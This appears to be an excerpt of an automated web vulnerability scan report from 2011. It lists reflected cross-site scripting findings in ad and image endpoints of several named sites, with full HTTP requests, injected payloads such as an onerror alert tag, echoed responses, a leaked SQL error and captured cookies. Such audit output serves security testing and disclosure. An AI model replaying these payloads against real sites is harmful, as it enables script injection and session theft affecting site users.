GET /RevenuePlatform/ad/generate?&callback=jsonp1297647421325&format=json&url=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&assocId=wapo-20&keywords=politics&divClass=washpost-bigbox&numLinks=4&showImages=true&width=auto&height=auto&contentId=profile-page&loadingInlineStyles=display%3Anone%3B&container=wapoLabsPromoBox2&cssUrl=null&visId=&userId=%5BCS%5Dv1%7C26AC438B850103D6-4000010D4000193E%5BCE%5D&commercialNode=politics65d5f<img%20src%3da%20onerror%3dalert(1)>139c3531da8&wapo_vis_id=null&wapo_login_id=null&s_vi=%5BCS%5Dv1%7C26AC438B850103D6-4000010D4000193E%5BCE%5D&da.userAgent=Mozilla%2F5.0+(Windows%3B+U%3B+Windows+NT+6.1%3B+en-US)+AppleWebKit%2F534.13+(KHTML%2C+like+Gecko)+Chrome%2F9.0.597.98+Safari%2F534.13&da.userLanguage=en-US HTTP/1.1
Host: oscar.wapolabs.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Date: Mon, 14 Feb 2011 01:39:09 GMT
Server: GlassFish v3
X-Powered-By: Servlet/3.0
Connection: keep-alive
Content-Length: 1250

jsonp1297647421325({"links":[],"data":{"class":"com.wapo.revenue.RevPlatformData","id":null,"assocId":"wapo-20","commercialNode":"politics65d5f<img src=a onerror=alert(1)>139c3531da8","container":"wapoLabsPromoBox2","content":null,"contentId":"profile-page","dateCreated":null,"divClass":"washpost-bigbox","finderOptions":null,"heightInPixels":"auto","keywords":"politics","section":
...[SNIP]...

1.238. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [container parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://oscar.wapolabs.com
Path:	/RevenuePlatform/ad/generate

Issue detail

The value of the container request parameter is copied into the HTML document as plain text between tags. The payload ec713<img%20src%3da%20onerror%3dalert(1)>307e13bd033 was submitted in the container parameter. This input was echoed as ec713<img src=a onerror=alert(1)>307e13bd033 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /RevenuePlatform/ad/generate?&callback=jsonp1297647421325&format=json&url=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&assocId=wapo-20&keywords=politics&divClass=washpost-bigbox&numLinks=4&showImages=true&width=auto&height=auto&contentId=profile-page&loadingInlineStyles=display%3Anone%3B&container=wapoLabsPromoBox2ec713<img%20src%3da%20onerror%3dalert(1)>307e13bd033&cssUrl=null&visId=&userId=%5BCS%5Dv1%7C26AC438B850103D6-4000010D4000193E%5BCE%5D&commercialNode=politics&wapo_vis_id=null&wapo_login_id=null&s_vi=%5BCS%5Dv1%7C26AC438B850103D6-4000010D4000193E%5BCE%5D&da.userAgent=Mozilla%2F5.0+(Windows%3B+U%3B+Windows+NT+6.1%3B+en-US)+AppleWebKit%2F534.13+(KHTML%2C+like+Gecko)+Chrome%2F9.0.597.98+Safari%2F534.13&da.userLanguage=en-US HTTP/1.1
Host: oscar.wapolabs.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Date: Mon, 14 Feb 2011 01:39:09 GMT
Server: GlassFish v3
X-Powered-By: Servlet/3.0
Connection: keep-alive
Content-Length: 6944

jsonp1297647421325({"links":[{"link":{"class":"com.wapo.revenue.Link","id":"0b89a60a-34c2-11e0-b2f6-1231391009d2","additionalFields":null,"amountSaved":"$10.05","asin":"1616081694","author":"Andrew J.
...[SNIP]...
ght":144},"adLinkId":"0010c27c-3657-11e0-b2f6-1231391009d2"}],"data":{"class":"com.wapo.revenue.RevPlatformData","id":null,"assocId":"wapo-20","commercialNode":"politics","container":"wapoLabsPromoBox2ec713<img src=a onerror=alert(1)>307e13bd033","content":null,"contentId":"profile-page","dateCreated":null,"divClass":"washpost-bigbox","finderOptions":null,"heightInPixels":"auto","keywords":"politics","section":"politics","url":"http://www.was
...[SNIP]...

1.239. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [contentId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://oscar.wapolabs.com
Path:	/RevenuePlatform/ad/generate

Issue detail

The value of the contentId request parameter is copied into the HTML document as plain text between tags. The payload 4c394<img%20src%3da%20onerror%3dalert(1)>bb26c5261f7 was submitted in the contentId parameter. This input was echoed as 4c394<img src=a onerror=alert(1)>bb26c5261f7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /RevenuePlatform/ad/generate?&callback=jsonp1297647421325&format=json&url=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&assocId=wapo-20&keywords=politics&divClass=washpost-bigbox&numLinks=4&showImages=true&width=auto&height=auto&contentId=profile-page4c394<img%20src%3da%20onerror%3dalert(1)>bb26c5261f7&loadingInlineStyles=display%3Anone%3B&container=wapoLabsPromoBox2&cssUrl=null&visId=&userId=%5BCS%5Dv1%7C26AC438B850103D6-4000010D4000193E%5BCE%5D&commercialNode=politics&wapo_vis_id=null&wapo_login_id=null&s_vi=%5BCS%5Dv1%7C26AC438B850103D6-4000010D4000193E%5BCE%5D&da.userAgent=Mozilla%2F5.0+(Windows%3B+U%3B+Windows+NT+6.1%3B+en-US)+AppleWebKit%2F534.13+(KHTML%2C+like+Gecko)+Chrome%2F9.0.597.98+Safari%2F534.13&da.userLanguage=en-US HTTP/1.1
Host: oscar.wapolabs.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Date: Mon, 14 Feb 2011 01:39:08 GMT
Server: GlassFish v3
X-Powered-By: Servlet/3.0
Connection: keep-alive
Content-Length: 1206

jsonp1297647421325({"links":[],"data":{"class":"com.wapo.revenue.RevPlatformData","id":null,"assocId":"wapo-20","commercialNode":"politics","container":"wapoLabsPromoBox2","content":null,"contentId":"profile-page4c394<img src=a onerror=alert(1)>bb26c5261f7","dateCreated":null,"divClass":"washpost-bigbox","finderOptions":null,"heightInPixels":"auto","keywords":"politics","section":"politics","url":"http://www.washingtonpost.com/wp-dyn/content/article/201
...[SNIP]...

1.240. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [divClass parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://oscar.wapolabs.com
Path:	/RevenuePlatform/ad/generate

Issue detail

The value of the divClass request parameter is copied into the HTML document as plain text between tags. The payload 585f4<img%20src%3da%20onerror%3dalert(1)>f19a341c5f4 was submitted in the divClass parameter. This input was echoed as 585f4<img src=a onerror=alert(1)>f19a341c5f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /RevenuePlatform/ad/generate?&callback=jsonp1297647421325&format=json&url=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&assocId=wapo-20&keywords=politics&divClass=washpost-bigbox585f4<img%20src%3da%20onerror%3dalert(1)>f19a341c5f4&numLinks=4&showImages=true&width=auto&height=auto&contentId=profile-page&loadingInlineStyles=display%3Anone%3B&container=wapoLabsPromoBox2&cssUrl=null&visId=&userId=%5BCS%5Dv1%7C26AC438B850103D6-4000010D4000193E%5BCE%5D&commercialNode=politics&wapo_vis_id=null&wapo_login_id=null&s_vi=%5BCS%5Dv1%7C26AC438B850103D6-4000010D4000193E%5BCE%5D&da.userAgent=Mozilla%2F5.0+(Windows%3B+U%3B+Windows+NT+6.1%3B+en-US)+AppleWebKit%2F534.13+(KHTML%2C+like+Gecko)+Chrome%2F9.0.597.98+Safari%2F534.13&da.userLanguage=en-US HTTP/1.1
Host: oscar.wapolabs.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Date: Mon, 14 Feb 2011 01:39:06 GMT
Server: GlassFish v3
X-Powered-By: Servlet/3.0
Connection: keep-alive
Content-Length: 1206

jsonp1297647421325({"links":[],"data":{"class":"com.wapo.revenue.RevPlatformData","id":null,"assocId":"wapo-20","commercialNode":"politics","container":"wapoLabsPromoBox2","content":null,"contentId":"profile-page","dateCreated":null,"divClass":"washpost-bigbox585f4<img src=a onerror=alert(1)>f19a341c5f4","finderOptions":null,"heightInPixels":"auto","keywords":"politics","section":"politics","url":"http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html","userId":null,"vis
...[SNIP]...

1.241. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [height parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://oscar.wapolabs.com
Path:	/RevenuePlatform/ad/generate

Issue detail

The value of the height request parameter is copied into the HTML document as plain text between tags. The payload 8c166<img%20src%3da%20onerror%3dalert(1)>c567a67c1c2 was submitted in the height parameter. This input was echoed as 8c166<img src=a onerror=alert(1)>c567a67c1c2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /RevenuePlatform/ad/generate?&callback=jsonp1297647421325&format=json&url=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&assocId=wapo-20&keywords=politics&divClass=washpost-bigbox&numLinks=4&showImages=true&width=auto&height=auto8c166<img%20src%3da%20onerror%3dalert(1)>c567a67c1c2&contentId=profile-page&loadingInlineStyles=display%3Anone%3B&container=wapoLabsPromoBox2&cssUrl=null&visId=&userId=%5BCS%5Dv1%7C26AC438B850103D6-4000010D4000193E%5BCE%5D&commercialNode=politics&wapo_vis_id=null&wapo_login_id=null&s_vi=%5BCS%5Dv1%7C26AC438B850103D6-4000010D4000193E%5BCE%5D&da.userAgent=Mozilla%2F5.0+(Windows%3B+U%3B+Windows+NT+6.1%3B+en-US)+AppleWebKit%2F534.13+(KHTML%2C+like+Gecko)+Chrome%2F9.0.597.98+Safari%2F534.13&da.userLanguage=en-US HTTP/1.1
Host: oscar.wapolabs.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Date: Mon, 14 Feb 2011 01:39:07 GMT
Server: GlassFish v3
X-Powered-By: Servlet/3.0
Connection: keep-alive
Content-Length: 1206

jsonp1297647421325({"links":[],"data":{"class":"com.wapo.revenue.RevPlatformData","id":null,"assocId":"wapo-20","commercialNode":"politics","container":"wapoLabsPromoBox2","content":null,"contentId":"profile-page","dateCreated":null,"divClass":"washpost-bigbox","finderOptions":null,"heightInPixels":"auto8c166<img src=a onerror=alert(1)>c567a67c1c2","keywords":"politics","section":"politics","url":"http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html","userId":null,"visId":null,"widthInPixels":"auto"},"adType":nul
...[SNIP]...

1.242. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [keywords parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://oscar.wapolabs.com
Path:	/RevenuePlatform/ad/generate

Issue detail

The value of the keywords request parameter is copied into the HTML document as plain text between tags. The payload 86faa<img%20src%3da%20onerror%3dalert(1)>c3dde673662 was submitted in the keywords parameter. This input was echoed as 86faa<img src=a onerror=alert(1)>c3dde673662 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /RevenuePlatform/ad/generate?&callback=jsonp1297647421325&format=json&url=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&assocId=wapo-20&keywords=politics86faa<img%20src%3da%20onerror%3dalert(1)>c3dde673662&divClass=washpost-bigbox&numLinks=4&showImages=true&width=auto&height=auto&contentId=profile-page&loadingInlineStyles=display%3Anone%3B&container=wapoLabsPromoBox2&cssUrl=null&visId=&userId=%5BCS%5Dv1%7C26AC438B850103D6-4000010D4000193E%5BCE%5D&commercialNode=politics&wapo_vis_id=null&wapo_login_id=null&s_vi=%5BCS%5Dv1%7C26AC438B850103D6-4000010D4000193E%5BCE%5D&da.userAgent=Mozilla%2F5.0+(Windows%3B+U%3B+Windows+NT+6.1%3B+en-US)+AppleWebKit%2F534.13+(KHTML%2C+like+Gecko)+Chrome%2F9.0.597.98+Safari%2F534.13&da.userLanguage=en-US HTTP/1.1
Host: oscar.wapolabs.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Date: Mon, 14 Feb 2011 01:39:05 GMT
Server: GlassFish v3
X-Powered-By: Servlet/3.0
Connection: keep-alive
Content-Length: 1206

jsonp1297647421325({"links":[],"data":{"class":"com.wapo.revenue.RevPlatformData","id":null,"assocId":"wapo-20","commercialNode":"politics","container":"wapoLabsPromoBox2","content":null,"contentId":"profile-page","dateCreated":null,"divClass":"washpost-bigbox","finderOptions":null,"heightInPixels":"auto","keywords":"politics86faa<img src=a onerror=alert(1)>c3dde673662","section":"politics","url":"http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html","userId":null,"visId":null,"widthInPixels":"auto"},"adType":null,"adId":"f279fcba-c65
...[SNIP]...

1.243. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [url parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://oscar.wapolabs.com
Path:	/RevenuePlatform/ad/generate

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload f3057<img%20src%3da%20onerror%3dalert(1)>992e2108bf2 was submitted in the url parameter. This input was echoed as f3057<img src=a onerror=alert(1)>992e2108bf2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /RevenuePlatform/ad/generate?&callback=jsonp1297647421325&format=json&url=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.htmlf3057<img%20src%3da%20onerror%3dalert(1)>992e2108bf2&assocId=wapo-20&keywords=politics&divClass=washpost-bigbox&numLinks=4&showImages=true&width=auto&height=auto&contentId=profile-page&loadingInlineStyles=display%3Anone%3B&container=wapoLabsPromoBox2&cssUrl=null&visId=&userId=%5BCS%5Dv1%7C26AC438B850103D6-4000010D4000193E%5BCE%5D&commercialNode=politics&wapo_vis_id=null&wapo_login_id=null&s_vi=%5BCS%5Dv1%7C26AC438B850103D6-4000010D4000193E%5BCE%5D&da.userAgent=Mozilla%2F5.0+(Windows%3B+U%3B+Windows+NT+6.1%3B+en-US)+AppleWebKit%2F534.13+(KHTML%2C+like+Gecko)+Chrome%2F9.0.597.98+Safari%2F534.13&da.userLanguage=en-US HTTP/1.1
Host: oscar.wapolabs.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Date: Mon, 14 Feb 2011 01:39:04 GMT
Server: GlassFish v3
X-Powered-By: Servlet/3.0
Connection: keep-alive
Content-Length: 1206

jsonp1297647421325({"links":[],"data":{"class":"com.wapo.revenue.RevPlatformData","id":null,"assocId":"wapo-20","commercialNode":"politics","container":"wapoLabsPromoBox2","content":null,"contentId":"
...[SNIP]...
ss":"washpost-bigbox","finderOptions":null,"heightInPixels":"auto","keywords":"politics","section":"politics","url":"http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.htmlf3057<img src=a onerror=alert(1)>992e2108bf2","userId":null,"visId":null,"widthInPixels":"auto"},"adType":null,"adId":"f279fcba-c657-11df-8542-1231391009d2","cssUrl":"http://bunsen.wapolabs.com/revplat/prod/1.0/css/widget_4.css","html":"\n<scrip
...[SNIP]...

1.244. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [width parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://oscar.wapolabs.com
Path:	/RevenuePlatform/ad/generate

Issue detail

The value of the width request parameter is copied into the HTML document as plain text between tags. The payload 5abca<img%20src%3da%20onerror%3dalert(1)>78683d983e8 was submitted in the width parameter. This input was echoed as 5abca<img src=a onerror=alert(1)>78683d983e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /RevenuePlatform/ad/generate?&callback=jsonp1297647421325&format=json&url=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&assocId=wapo-20&keywords=politics&divClass=washpost-bigbox&numLinks=4&showImages=true&width=auto5abca<img%20src%3da%20onerror%3dalert(1)>78683d983e8&height=auto&contentId=profile-page&loadingInlineStyles=display%3Anone%3B&container=wapoLabsPromoBox2&cssUrl=null&visId=&userId=%5BCS%5Dv1%7C26AC438B850103D6-4000010D4000193E%5BCE%5D&commercialNode=politics&wapo_vis_id=null&wapo_login_id=null&s_vi=%5BCS%5Dv1%7C26AC438B850103D6-4000010D4000193E%5BCE%5D&da.userAgent=Mozilla%2F5.0+(Windows%3B+U%3B+Windows+NT+6.1%3B+en-US)+AppleWebKit%2F534.13+(KHTML%2C+like+Gecko)+Chrome%2F9.0.597.98+Safari%2F534.13&da.userLanguage=en-US HTTP/1.1
Host: oscar.wapolabs.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Date: Mon, 14 Feb 2011 01:39:06 GMT
Server: GlassFish v3
X-Powered-By: Servlet/3.0
Connection: keep-alive
Content-Length: 1206

jsonp1297647421325({"links":[],"data":{"class":"com.wapo.revenue.RevPlatformData","id":null,"assocId":"wapo-20","commercialNode":"politics","container":"wapoLabsPromoBox2","content":null,"contentId":"
...[SNIP]...
InPixels":"auto","keywords":"politics","section":"politics","url":"http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html","userId":null,"visId":null,"widthInPixels":"auto5abca<img src=a onerror=alert(1)>78683d983e8"},"adType":null,"adId":"f279fcba-c657-11df-8542-1231391009d2","cssUrl":"http://bunsen.wapolabs.com/revplat/prod/1.0/css/widget_4.css","html":"\n<script type=\"text/javascript\" src=\"http://media.wash
...[SNIP]...

1.245. http://pandora.cnet.com/api/rest/ddaImageHandler/index.php [fieldNum parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://pandora.cnet.com
Path:	/api/rest/ddaImageHandler/index.php

Issue detail

The value of the fieldNum request parameter is copied into the HTML document as plain text between tags. The payload 36492<a>8def619f669 was submitted in the fieldNum parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /api/rest/ddaImageHandler/index.php?fieldNum=336492<a>8def619f669&fuseaction=download&keyval=2n540drqg0i_2 HTTP/1.1
Host: pandora.cnet.com
Proxy-Connection: keep-alive
Referer: http://i.i.com.com/cnwk.1d/Ads/7074/11/moneywatch_carousel_300x250.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:37:48 GMT
Server: Apache/2.2
Set-Cookie: PHPSESSID=a14fe6e069362d2f01edda135c5e542d; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 248
Content-Type: text/html

Unknown column 'img_bin336492' in 'field list'

<br><br>SELECT img_bin336492<a>8def619f669 AS bin_data, img_binType336492<a>8def619f669 AS filetype FROM dda2_preview WHERE keyval='2n540drqg0i_2'

ses
...[SNIP]...

1.246. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.invitemedia.com
Path:	/admeld_sync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload be085'%3balert(1)//2a45c87cfb4 was submitted in the admeld_callback parameter. This input was echoed as be085';alert(1)//2a45c87cfb4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /admeld_sync?admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/matchbe085'%3balert(1)//2a45c87cfb4 HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?.s1hAPQwCgD01TAAAAAAAK2gDQAAAAAAAgAQAAIAAAAAAP8AAAABFWJSEwAAAAAAY04TAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACWOwUAAAAAAAIAAgAAAAAAmpmZmZmZ8T-amZmZmZnxP5qZmZmZmfE.mpmZmZmZ8T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADacgV4OXmhCUlS6anFfIVdJbtK4S9KioraJLUCAAAAAA==,,http%3A%2F%2Fwww.drudgereport.com%2F,Z%3D300x250%26s%3D667892%26r%3D1%26_salt%3D1162597115%26u%3Dhttp%253A%252F%252Fwww.drudgereport.com%252F,f4e74ee2-37e2-11e0-a10f-001b24783b3e
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=82d726c3-44ee-407c-85c4-39a0b0fc11ef; exchange_uid=eyIyIjogWyI0NzYwNDkyOTk5MjEzODAxNzMzIiwgNzM0MTcwXSwgIjQiOiBbIkNBRVNFSk81T0hYNWxOR0lITDdmRUVFSjQtWSIsIDczNDE1MV19; io_frequency="{\"8866\": [0+ 0+ 1296072684+ 1+ 1296072684+ 1]+ \"8171\": [0+ 0+ 1296660699+ 2+ 1296659838+ 2]+ \"9239\": [0+ 0+ 1297186251+ 1+ 1297186251+ 1]+ \"9376\": [0+ 0+ 1296659628+ 1+ 1296659628+ 1]+ \"8991\": [0+ 0+ 1297259805+ 3+ 1297259805+ 1]+ \"8733\": [0+ 0+ 1295634039+ 1+ 1295634039+ 1]+ \"9080\": [0+ 0+ 1297185928+ 1+ 1297185928+ 1]}"; impressions="{\"351309\": [1296660699+ \"6b326db0-ad1f-378f-98c3-837da14b6503\"+ 139089+ 81343+ 191]+ \"426723\": [1297259805+ \"d0c21fd3-dc6f-3508-8eb4-98c1ea2808ab\"+ 14387+ 57084+ 171]+ \"448883\": [1297186251+ \"2d72556f-3614-3865-9fd7-81648ddadef0\"+ 1770+ 21233+ 1365]+ \"429622\": [1295634039+ \"94ea05fe-2d4a-3bf7-a98e-3964b49408cd\"+ 83803+ 56236+ 46]+ \"417817\": [1296072684+ \"5b6de59f-cbbc-3ba4-8c51-0a4d6d7a0ec7\"+ 8863+ 40494+ 9173]+ \"456235\": [1296659628+ \"85680993-10ca-3909-9c72-ac737305e927\"+ 139089+ 81343+ 191]+ \"464239\": [1297185928+ \"5ca41985-3250-3989-8563-9e7bafc13c64\"+ 12149+ 59109+ 1365]+ \"426722\": [1297089042+ \"cf924af7-fb85-3eb0-b32f-8647072b898d\"+ 12202+ 59105+ 993]}"; partnerUID=eyIzOCI6ICJ1JTNENjI4NTE2MDUyNiUzQXMxJTNEMTI5NTQ4MjM3NjkxNyUzQXRzJTNEMTI5NzA4ODIyNDE1MCUzQXMyLjMzJTNEJTJDNjU3MCUyQzcwNTMlMkM2MzMzJTJDNTIyMyUyQzI3IiwgIjg0IjogWyJEVFFrZTdUOTk5WTRxWUpCIiwgdHJ1ZV19; frequency="{\"351309\": [1296660759+ 1+ 1296660699+ 2+ 1296659838+ 2]+ \"426723\": [1297274205+ 1+ 1297259805+ 1+ 1297259805+ 1]+ \"426722\": [1297103442+ 1+ 1297089042+ 2+ 1297089042+ 1]+ \"456235\": [1296659688+ 1+ 1296659628+ 1+ 1296659628+ 1]+ \"429622\": [1295893239+ 1+ 1295634039+ 1+ 1295634039+ 1]+ \"417817\": [1297368684+ 1+ 1296072684+ 1+ 1296072684+ 1]+ \"464239\": [1297214728+ 1+ 1297185928+ 1+ 1297185928+ 1]+ \"448883\": [1297272651+ 1+ 1297186251+ 1+ 1297186251+ 1]}"; subID="{}"; segments="17155|30304|10068|10069|40053|40050|39544|27804|22870|6761|38582,1298044270|40657|17277|24085|10102|5379|24391|39004|11262|5371|11265|10629|10660|10816|40057|8|28666|17440|27875|16733|26871|30211|39944|10641|29998|18125|39220|18129|24348|29994|24380|39650|5443|24810|27273|16034|24469|17163|10048|3771|39975|26901|16748|3779|18237|16490|16709|21886|28686|18134|22647|22994|21461|30353|7775|24461|24909|40589|20981|14947|28398|23667|27906|40046|18149|39646|17170|4465|38028|16713|3391|3783|24171|3392|23864|13746|3425|9800|38142|24352|38781|37720|2377|30530"; dp_rec="{\"1\": 1297089043+ \"3\": 1297527300+ \"2\": 1297185919+ \"4\": 1296660699}"; 